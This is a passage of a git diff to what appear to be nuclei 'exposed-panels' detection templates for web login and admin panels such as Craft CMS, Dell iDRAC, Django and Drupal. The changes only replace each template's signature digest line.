4a0a00473045022077cd849c38cea5a2c415736a022a06de8792ec0999d3615cd1f5438720d1d2cb02210084437d0ed80eaf269a47d8fd6dc57b26037337487fba621b13e324a55640ec73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220025a11e1d8b1932625a7ded7948109d8d5a8451156980b2713b99284f28ae32d022100f9c3ea0c557809e6ee79a9736b7aa4b53d301b7211f99c3a5ade7ce3e92c61a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/craftcms-admin-panel.yaml b/http/exposed-panels/craftcms-admin-panel.yaml index cb538d70e7..b6acd96dc0 100644 --- a/http/exposed-panels/craftcms-admin-panel.yaml +++ b/http/exposed-panels/craftcms-admin-panel.yaml @@ -35,4 +35,4 @@ http: part: body words: - '<\/script>' -# digest: 4a0a004730450220231ddbcaf05bd0329bfb2861daed264872423a67ab82390e7e9af65a07253f57022100cc7ef97bb7152bff2132f77dc1b66995db259d97dc2152a56a839bb04015cb9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210092d66e6ad353bf88679ea00a2f59c7b639945152608ddeefecce9ac7d536692002203f5b1512c25d8b18e7af6e51a7622662fc1072a853cf405ba4a6cabad64864d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dahua-web-panel.yaml b/http/exposed-panels/dahua-web-panel.yaml index 108d0a6397..1c830b1686 100644 --- a/http/exposed-panels/dahua-web-panel.yaml +++ b/http/exposed-panels/dahua-web-panel.yaml @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220397b44e33c005a8764cb81d187bda04ef52ca18080f5438267606c8dc0403aa202205dc4369881b4e69358e0cd5e3276fef2731978544dd60ed44acd6afbde4f6694:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202439e0b33f565bb29d258453ea7975fc89f2540acdee02604e1512c585b3d2690220406689fe81cab29d8748aea5ab8e8f9980077909750197e7c6b834046d75461b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/darktrace-threat-visualizer.yaml b/http/exposed-panels/darktrace-threat-visualizer.yaml index d221e57784..cc7abface2 100644 --- a/http/exposed-panels/darktrace-threat-visualizer.yaml +++ b/http/exposed-panels/darktrace-threat-visualizer.yaml @@ -35,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221009b117d9966e85ca8dc4f53d3ef8857181afa1a939670d2433bacfc689ecc83b8022100fb6ebf975b53c5992928c3b737655a144e6a0af155ec3fc651f9a6f425602b20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203f3a8af104b9dde7f3db6f51e29e25d0cacd59dc60dd5ac03c470ac29602f2ac02202ff6a50159ca33fed417915a336224787b3a628930320bd2fd776f2122adbbac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dashy-panel.yaml b/http/exposed-panels/dashy-panel.yaml index 5ff95c512e..4a5324b0aa 100644 --- a/http/exposed-panels/dashy-panel.yaml +++ b/http/exposed-panels/dashy-panel.yaml @@ -36,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c3b64d03bf58ff86ebb77624b3f4b8f1e6970267d2130f6f5767e4676e35eb130220037ea0c922c9e0041053ea3fdd6fd97ae92839109c2ac7a7cf9183b44580912d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029440aec88ab9ccf4da1990ee1ea74e822175729820ec74261ba0b93e2cd972902200f650af9584d79091244a03b6777185d18278e3ff898c2ef3db43e167e4d14ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/datadog-login.yaml b/http/exposed-panels/datadog-login.yaml index 4994e02c84..5df9ea352a 100644 --- a/http/exposed-panels/datadog-login.yaml +++ b/http/exposed-panels/datadog-login.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022040b91eb13424cf198734769a7373cb8177d45baec828b1bca4cbbee7832c372d02207bf045cc446ee34a3d6da19aeca495fe794a4f9e034ed41d0f43418df4a64c4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ba1b4c42b4f95dc002c1b389ce707cd8156e659b7458b3d0c237caafb2a8e7cd0221009c89ebdb1c3767b1f5b131ee5002ff00cdf083939259bed505bd0eaf1bc78ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dataease-panel.yaml b/http/exposed-panels/dataease-panel.yaml index 9f3a62b7d7..296e17e2f0 100644 --- a/http/exposed-panels/dataease-panel.yaml +++ b/http/exposed-panels/dataease-panel.yaml @@ -36,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ab974518fc45b06d7a3a6fce97a69772da8d341cb130009593d5f9f10939f563022100d16e71fd20628009f748f93ded21d8643cd34c23ecfc00447bf2533c946d65d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100862d589284943e34778a6a616407a01e9381049bf3ad1d2a8326c8a46d3760bc02207da8441d4eaa65d4214421fbe1533709514c9ce2aa3b76c92187d7a02611467b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dataiku-panel.yaml b/http/exposed-panels/dataiku-panel.yaml index 42ae78c90a..1f68d630b0 100644 --- a/http/exposed-panels/dataiku-panel.yaml +++ b/http/exposed-panels/dataiku-panel.yaml @@ -29,4 +29,4 @@ http: part: header words: - "text/html" -# digest: 490a0046304402200628eddb62ad05dca3bb0da5c19dc6f5319a3af1ce2c53b53defbfe7a4b54b3a0220519be27ab5a3230eb8263e9b729ca3d9be39fa1d518258c329da94c30557369f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf930e53c220ef10054e30544f10f8da6c39735dc37a4fcb5617e89b846126560220587db0c30779629768374cc267eba9fa2a4cb539b19afdfd1fadb68af537d6ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/davantis-panel.yaml b/http/exposed-panels/davantis-panel.yaml index 07007b967b..308d27be4f 100644 --- a/http/exposed-panels/davantis-panel.yaml +++ b/http/exposed-panels/davantis-panel.yaml @@ -28,4 +28,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022062dbea54f4204fbfcc81bbb9b2801d96c631b5892f9d4c45e06c2ac12cb2e5e1022068e7b3212cd4a0f5fafe1ae80e5266e49946cba37e2b40d48456c9f17737c681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022053853afb1fa9d70559f6b89e920efa79c1375023a9e222d172f6d2dd44782f28022100f0ae424cd16c1f1879de99d506e19cc24805ac4011cf592219da2f0a201b1552:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/daybyday-panel.yaml b/http/exposed-panels/daybyday-panel.yaml index fee27d8a81..c769ff92de 100644 --- a/http/exposed-panels/daybyday-panel.yaml +++ b/http/exposed-panels/daybyday-panel.yaml @@ -35,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203cbf712245b4825ddf753f674d56f792f859e83d5fb72d37eec7a702d7b203a1022100e436ec52240192c77e0aeecdf44cd857b2fc978d35b8b24bc2d272f64530d933:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207f06b8237f3ded431b1d66e30ee6db83e537461d38d34442a340264fb51657f4022100b621a48e3c38b18477c37d6c28615b19e960ec1767aa72e9bdb81f2386e80f34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dell-bmc-panel-detect.yaml b/http/exposed-panels/dell-bmc-panel-detect.yaml index 7c556f2798..3b526c4639 100644 --- a/http/exposed-panels/dell-bmc-panel-detect.yaml +++ b/http/exposed-panels/dell-bmc-panel-detect.yaml @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205b25e3817212eb779bbf8f345bd662d126235dc77066b84907a0e6392a3b014a02204d6ccf85adac98bb0b0ec6b7f29b9733e44826ef55237b3a9a041e330ff39566:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fa1fe7261140ee75a539d7765e780cf8e5f564026ca0f98c7cae7e3f06c9ddc40221008ea0e973dafb34e00fe3e175605622c53652509e3e7af3d8c5fedc221a85e987:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dell-idrac.yaml b/http/exposed-panels/dell-idrac.yaml index d7a4fc65c9..031722167e 100644 --- a/http/exposed-panels/dell-idrac.yaml +++ b/http/exposed-panels/dell-idrac.yaml @@ -34,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202bf3ea14a9c4138e2fb9a81688d600b8a79899eba950245fdcb458e3f8650f30022010fd51f875040c70b57cf8744e4a3fdb13ac80c3c0e4ff60eb1f3ec1c1217ff6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f19401ef584e1f28c0d43d48d3e5c0f6a4577585f68c45e992e16ce27830a435022100e0644cd117d53f5d8b2efe9b6d5970335c28dc503ba0f6143cb14f1570b19a71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dell-wyse-login.yaml b/http/exposed-panels/dell-wyse-login.yaml index 734aa03be1..0a25b50ca9 100644 --- a/http/exposed-panels/dell-wyse-login.yaml +++ b/http/exposed-panels/dell-wyse-login.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203f4caaf94dc0d326d2978f06944ac7003b6145bf0d7e9f0275b17ada6f97b3d702201226515a561b0f3e7b0718077765f3c93228937829b278ebc2dacf41fc899b7b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207b558abceea7e76be9fc8ebaa7bb5992a0ee08e00c8d61e92bf1463df755b689022100a569c626dda03070956c6af0e608f978aa886fab47706b4e109d8c9b94331665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/deluge-webui-panel.yaml b/http/exposed-panels/deluge-webui-panel.yaml index 37e65d3ce7..d4bbb82319 100644 --- a/http/exposed-panels/deluge-webui-panel.yaml +++ b/http/exposed-panels/deluge-webui-panel.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205e8380fd8ca17e6b81ea0c63b0153114e70dc964189867755c139cfea4986c0102204afe490ccab285f4d497bb0ddf995b96d149082aa55339b0dcb7148eb7132f10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d8a1d367725f5e2ff200bd8a3fa5bba10fc9f59bc7355927e8fdc45086681981022100ffa17d8e88c086dd7643fbd295adf615b01a660df126c99e7fdefbe2c83127a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/digital-watchdog-panel.yaml b/http/exposed-panels/digital-watchdog-panel.yaml index 655fafc9e4..157982f636 100644 --- a/http/exposed-panels/digital-watchdog-panel.yaml +++ b/http/exposed-panels/digital-watchdog-panel.yaml @@ -25,4 +25,4 @@ http: - type: dsl dsl: - "status_code==200 && ('868509217' == mmh3(base64_py(body)))" -# digest: 4b0a00483046022100e849b952b0ea96f568c0746acad027fb76ea85738d9e5621a94afaa79103f005022100b9d51a990553586b7768ff6474f128f3d0e607497de83d955f6a67084e7d5c57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d1f23915bf024abbabe02e6d8a4b82700223be9f6816a82e0f35d56c1ba865c50221009dd7d20893e6ccd9247144899ba2714f4d97e4e4872ba86dc0b02cd3b17ca2e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/digitalrebar-login.yaml b/http/exposed-panels/digitalrebar-login.yaml index 831d6eb3f1..208c18ef74 100644 --- a/http/exposed-panels/digitalrebar-login.yaml +++ b/http/exposed-panels/digitalrebar-login.yaml @@ -38,4 +38,4 @@ http: part: body words: - 'Digital Rebar' -# digest: 4a0a00473045022100b7019f931e0fafef9e3ab6a9ca6b4b18a7e78e84002ed960a63b446be12fa0f802204a07e0cb558a25332bae48c53c5d6929e4a06af223cd2a1c0e8e3e8841108a84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022069d475d274e6c032708d081fd96eb2cd1fb0ea38f121fc4d0874c9103ee97da90221009e17ea6f320f6ced62d41055d2e377963aa246de23daa1eac2fae684620ae5ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/directadmin-login-panel.yaml b/http/exposed-panels/directadmin-login-panel.yaml index 02afd5df9a..1d4f87418e 100644 --- a/http/exposed-panels/directadmin-login-panel.yaml +++ b/http/exposed-panels/directadmin-login-panel.yaml @@ -36,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009b0b25b6ff69ffbfc0bbf0190c5116227080c11ee24d3c781aca2dd27922f08802204832455ae36d57ccffc3f7a8928edc69db5f8c940eba343bd2424d0e3967c177:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022066fd81f2a893f8499a68839023a5fdc4974f045566c63123b11000f5ed581ff402206945756a8f863d190a9512efc643dac9fda1a98437cb25545f8bcf0783a314b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/directum-login.yaml b/http/exposed-panels/directum-login.yaml index 364fb1b5e2..120816bcde 100644 --- a/http/exposed-panels/directum-login.yaml +++ b/http/exposed-panels/directum-login.yaml @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204e7fa486ab9fe23fad046847f5d53c5d885817c3e11c39aba52f8501fc6355980220246a1eae600ad33e7563765911781b9394d418069ad69f5260f87dc87cba093b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100905eb3c031666559f9fc3152d9969edafa77f3e939bc4fbb79210e608dec1ac8022100a7c3633d4fa725c729c7cd4293beae25593003903f16a63cc37f2dc06f194681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/discuz-panel.yaml b/http/exposed-panels/discuz-panel.yaml index 30af114ecb..6750b892c9 100644 --- a/http/exposed-panels/discuz-panel.yaml +++ b/http/exposed-panels/discuz-panel.yaml @@ -35,4 +35,4 @@ http: group: 1 regex: - 'X([0-9.]+)<\/em><\/p>' -# digest: 4b0a00483046022100be5ff986d400ea8da1ee84a8424a628e7b296c1a491dc2eb9d7e0ccfd4dd1d5d022100f361a42383aedcf586525ab02aa9f2e70fb5ca56764fe2ac99105ca1ebb9111b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210097a74f17ffb2b4e647c84c9056f480dab7093104577773000185b34a1ab7054e0221008c8448bbe03ed2c17134c6cf727d1625726145b2a3046bd08104430ff5020e48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/django-admin-panel.yaml b/http/exposed-panels/django-admin-panel.yaml index a3abacfa8c..68745145ed 100644 --- a/http/exposed-panels/django-admin-panel.yaml +++ b/http/exposed-panels/django-admin-panel.yaml @@ -27,4 +27,4 @@ http: - "Django administration" condition: and part: body -# digest: 4a0a00473045022100b9e459a2e2410686287e59d497114f4c41e2e31fa4936194483560ddb48bce1402207c756b1c2321fc279db6302f3aec2c33ee64d8bf2b26bc4771fc32baff98bb64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac02c54225e975d3158eb41af01a31c5140aed18e7d38914fc03d73c3f52e4f1022046df2c0f2c1ac45625152b39485a91c7dc569d88b0b24fc5349d458d836c7961:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/docebo-elearning-panel.yaml b/http/exposed-panels/docebo-elearning-panel.yaml index 7f36d42c2f..c9a1cb0bf7 100644 --- a/http/exposed-panels/docebo-elearning-panel.yaml +++ b/http/exposed-panels/docebo-elearning-panel.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022010bd0422bd48230d9f4b376bfd14fc999a6f290389c40d18d79c6e60d6d5ecc7022100ea449a06b2e0b39439d0e310f6b2233582a7a21589db52c6134fe148719018d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022032c2d41fe6ab303a2af0be0252600a10441157240717877684003563cb062e09022013427980fce1b8f2e1f41d4bd2854b07cf35c046bc7c8f4877a097a3e09d9256:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dockge-panel.yaml b/http/exposed-panels/dockge-panel.yaml index 0fe258c1f2..c8c5d5c30f 100644 --- a/http/exposed-panels/dockge-panel.yaml +++ b/http/exposed-panels/dockge-panel.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204bfb0d756bbd4a6b566856fecccaf2bd87003970a4afc29eb638d47ff5ae7ebd022100eb52dee7c3836cf4234eb7e49b658e8acf3015615ba8fb8fd8ab06883e82d145:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009639716a39823e9a7e7895688e60297f842a7d12089c33d36bcff589276a41b7022100cfd4bad60cabb91146dafe8f4e136a70c408b803149d8d77bdf1a1f3532a939b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dokuwiki-panel.yaml b/http/exposed-panels/dokuwiki-panel.yaml index 941ed1211e..75c81600a6 100644 --- a/http/exposed-panels/dokuwiki-panel.yaml +++ b/http/exposed-panels/dokuwiki-panel.yaml @@ -25,4 +25,4 @@ http: - 'status_code == 200' - 'contains_any(body, "dokuwiki__header", "content=\"DokuWiki", "/dokuwiki/")' condition: and -# digest: 4a0a0047304502205cf03bfe13c982579e2351db963145e343a76c28ffb173d4d42d464a123b658f022100c98770a8909d655ab6cc1a4ba8bcda6d998d0309715c6d932122ec77151e2c60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210098f8ad2f891fcec698d9ee9905ad409416c125e1d7ee9677e68b884c3b046d38022100d49af03fbf040d2dbcc1421f61270a2c03c143b8b47897c4660a5633a78b1ed7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/doris-panel.yaml b/http/exposed-panels/doris-panel.yaml index 29e2840aa9..2048801147 100644 --- a/http/exposed-panels/doris-panel.yaml +++ b/http/exposed-panels/doris-panel.yaml @@ -28,4 +28,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210082f87c0a59997b9777291daf69ace181c11f924a7ab9ccc20ba6827a5571a0f4022100caf9db11a109351159c3345fe8687446524df194cdcd624afbd0301a0c97d3d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bd68dfe5d1e6c61141aafdf31b9017aafb7b3327c6d0624083b99a164c801806022024d35f5c9e4860e4d8316fbcabc0eae8c139454fc8efc1ac853b5c130784f593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dotclear-panel.yaml b/http/exposed-panels/dotclear-panel.yaml index 0acbb5011d..7dc4d26b05 100644 --- a/http/exposed-panels/dotclear-panel.yaml +++ b/http/exposed-panels/dotclear-panel.yaml @@ -37,4 +37,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220614691a796df81e290377dc18a603b7949eb9aaf0e430d5548007cdbe6a23f6a02201025f6927189a5ac6d70f970de2a8e43ca0996c2b31dcbecbab437ca8725c251:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220659024b348e587f9c1eb76d8d31a1e7ea35bf978289bb79dba5d69385f76bbb4022100ae8e9b4ff9a0f9df3eb379220094550a19a5c554358575713ede6675020d6fdd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dotcms-admin-panel.yaml b/http/exposed-panels/dotcms-admin-panel.yaml index 6551823659..edf610792d 100644 --- a/http/exposed-panels/dotcms-admin-panel.yaml +++ b/http/exposed-panels/dotcms-admin-panel.yaml @@ -28,4 +28,4 @@ http: - type: word words: - 'dotCMS Content Management Platform' -# digest: 4a0a004730450220562634635875c92a53a45561d73ef512768b6048df155652771d7e090a1a93cc022100fe074d6bb787b158b91bd2d64f4986c4af7b6cf18059b8c81966fbbefd0cc01c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ebd16e591f3b58ebb21454f0eac68f2742c7d3b162ec265e70a4cb54454fa5ce0220429eb74d1115fc7a6f0edcdd8961b515561025b17678bb0b0854425ce863aa6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dplus-dashboard.yaml b/http/exposed-panels/dplus-dashboard.yaml index d9097baf8c..04fd3cccaf 100644 --- a/http/exposed-panels/dplus-dashboard.yaml +++ b/http/exposed-panels/dplus-dashboard.yaml @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022067ac049abe607a28672218ae4b71b08db3d3cb65ffdf822305da0e69103a68f902203e95f96212d73e6e356204d5eba791651e9fe196692ef14ac667a96f606d0449:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022001b568167d9213af903edc7551be9a57eae28353681e086dbcc32277eec715f5022100e1854ac6b8eb037d7eb0f22d52b7b3dc7b5b382e03ca4fb235f6f20faeac8607:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dqs-superadmin-panel.yaml b/http/exposed-panels/dqs-superadmin-panel.yaml index 3bd88835ba..1726e57ce3 100644 --- a/http/exposed-panels/dqs-superadmin-panel.yaml +++ b/http/exposed-panels/dqs-superadmin-panel.yaml @@ -28,4 +28,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022072e688cc448670c7fc479d5bb87d73cb612fa32074ffe89cbb2a10fb5b063dc3022100ac20f23ecc34ece15b920f92f6a3c866f90b86e8cabc93a391f107648e5ea7d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ee714cbdb7c3c49ffc61a5c5bd68d155a548f453d5ccf9a32704089a84e622cd0220379cd4757f04fa3db23af58a79afcc1ced8c3cad222c6f0329b921ccddcfa4c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dradis-pro-panel.yaml b/http/exposed-panels/dradis-pro-panel.yaml index 248031199c..e13e172f2d 100644 --- a/http/exposed-panels/dradis-pro-panel.yaml +++ b/http/exposed-panels/dradis-pro-panel.yaml @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a0bff71141bdee950ac6ad50149049d720d9e7fa095b05919b15a01127ee782d02202216570cd21edd333080c08f0eed32b2d2c987a457f3249cf0c9e3df6e8b2c49:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100804c41629c7df6973f57cde7de7a3fc5c6b111b7bbc65c9a48164c05490d9883022100dad881ab36d15504a3d75206020349b45fbd087d124cb6c81d8bba9b00faffae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/drawio-flowchartmaker-panel.yaml b/http/exposed-panels/drawio-flowchartmaker-panel.yaml index c134a3ce4a..15b3eab5a2 100644 --- a/http/exposed-panels/drawio-flowchartmaker-panel.yaml +++ b/http/exposed-panels/drawio-flowchartmaker-panel.yaml @@ -38,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022028012c9ed9aa191524ee962f7289a19da18537353af37d7c0c38a6015df3ef35022100c4cf24f3d62c62df742b4e14c4efdedce01db38d05b430d47daada8716c908f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210084da5a68a171c77891dfb9d34e04344f6ffa29ce2c77b514b3904598295199cb02203fc8ed38696651bd6696d85b2dcfe18cfa2b6f51f72068bafda586318e690293:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/druid-console-exposure.yaml b/http/exposed-panels/druid-console-exposure.yaml index 4944c7aa81..b53136a90f 100644 --- a/http/exposed-panels/druid-console-exposure.yaml +++ b/http/exposed-panels/druid-console-exposure.yaml @@ -26,4 +26,4 @@ http: - 'src="/druid.js"' - 'href="/druid.css"' condition: and -# digest: 4a0a00473045022100d4161cb16b1fa1f75f4a71ed8c2f35300ac1be66eacf7805dc92cc60896f158e0220057cafb07518bb1637590061583db933b70472dd2f94a66a1086bc19190d2194:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb1f35bddc35d199774f3292212f8a13aa8946eb0be751b46d081e3fffdb0d0302207c53c99b6fac30e1fdefe278a45d4821d9c0809f8e69f48e57b5cfc585101c37:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/druid-panel.yaml b/http/exposed-panels/druid-panel.yaml index 7a90ead3e4..3ea4f976d2 100644 --- a/http/exposed-panels/druid-panel.yaml +++ b/http/exposed-panels/druid-panel.yaml @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d7185770da29b4b8a20493cdc0d8823e1e11c959b10956de5d45638d1a86f5fd022051801ed3d7cae82a52990d3c26dec63b321aaa3b464c991d959033f5185b9154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201db8ebbf0b73b84a4ffd48e4975d25db2ec157948da269339398d12a93244002022010db034fb050c05c55fd2f7140bdd794832f87f8ce3a6bcc82d8dc03a904142d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/drupal-login.yaml b/http/exposed-panels/drupal-login.yaml index eaf5291efe..d73ef9a949 100644 --- a/http/exposed-panels/drupal-login.yaml +++ b/http/exposed-panels/drupal-login.yaml @@ -41,4 +41,4 @@ http: - '(?i)x-drupal' - "(?i)x-generator: drupal" condition: or -# digest: 4a0a004730450221008041029adacd7fec040783fac0c48a716cebd4fc13de47ce5d09bc89a02618c0022028204ca76bc5716fa67df5b1a8cff3703885087e123148cf12a91cca8e01503b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008fdf2cb9d64b8de987b2e471dcd2a56510fbac1a8d4437cf7a85a07304c5c524022100ad0973ec6bb48acc2c6969522b15354c111d0581968029cf044e6a4fd027e1e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dxplanning-panel.yaml b/http/exposed-panels/dxplanning-panel.yaml index 7caaad0caa..eeb66f2aab 100644 --- a/http/exposed-panels/dxplanning-panel.yaml +++ b/http/exposed-panels/dxplanning-panel.yaml @@ -33,4 +33,4 @@ http: group: 1 regex: - '([0-9.]+)' -# digest: 4b0a004830460221008ebd5b0fb933eaf872a0f11c39bce6716f16179f11abe13ee7283cc270cf5f5d022100fab7cdc658b1440b7a3415d75308f81052fa808e09397d91894a07f570bd5a80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a13a6ac9969d90ab892c59684f5e2c90d64ec9392c10f2f65a19ebb223af9d9e0220640dabae7d57d8c9a20d025f892d806503e1ee9bd1c1206417a13387885f4d69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dynatrace-panel.yaml b/http/exposed-panels/dynatrace-panel.yaml index 1727044122..5be2ca6502 100644 --- a/http/exposed-panels/dynatrace-panel.yaml +++ b/http/exposed-panels/dynatrace-panel.yaml @@ -30,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f90ceda6fefe82988a3b4aeff26255be542eaaab02ae0197973537f44a588219022035aabf38ef0b3067367bf7c5dad8551adbe76efdb6e7ffacb01ced9f2c3073ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205ef83ad4c2eec6ec56c1d30e32a4ce5eb70005027ab052cc209bb35f0edb4b3f02207f20e03c0fd6b55c43bdde96862e1b4a500189679c5d930c823c7c90261f2f6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml index 966964e4a8..e28dcee38c 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207dd82cd9d805d495ca7962bd7a3699a412ef812f1406c9629c55e9008ee9db0e022100a1225e35ce7578267c2dd552b0e902d13bfd1c33ecb3e59c69e3a815729c1779:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100fdcd161621a7550c8ad7d5f6b6893aa35b0de446af2d34f987ef1fac67dd32cc022100c45d20e969123f42ba7e01c55465442e2c88e307a46c2c6cd66d83dfcc2f6d2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml index 58da9e2810..e8531b79b6 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-panel.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022068e466b86e791e28057963f2c8636e6051bab39501a4a396e536936237c4cc3a022009c50cc2f760de82e4ffd2d8415301ea2c7eae1a73f697d0a808c0c3d489ea9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 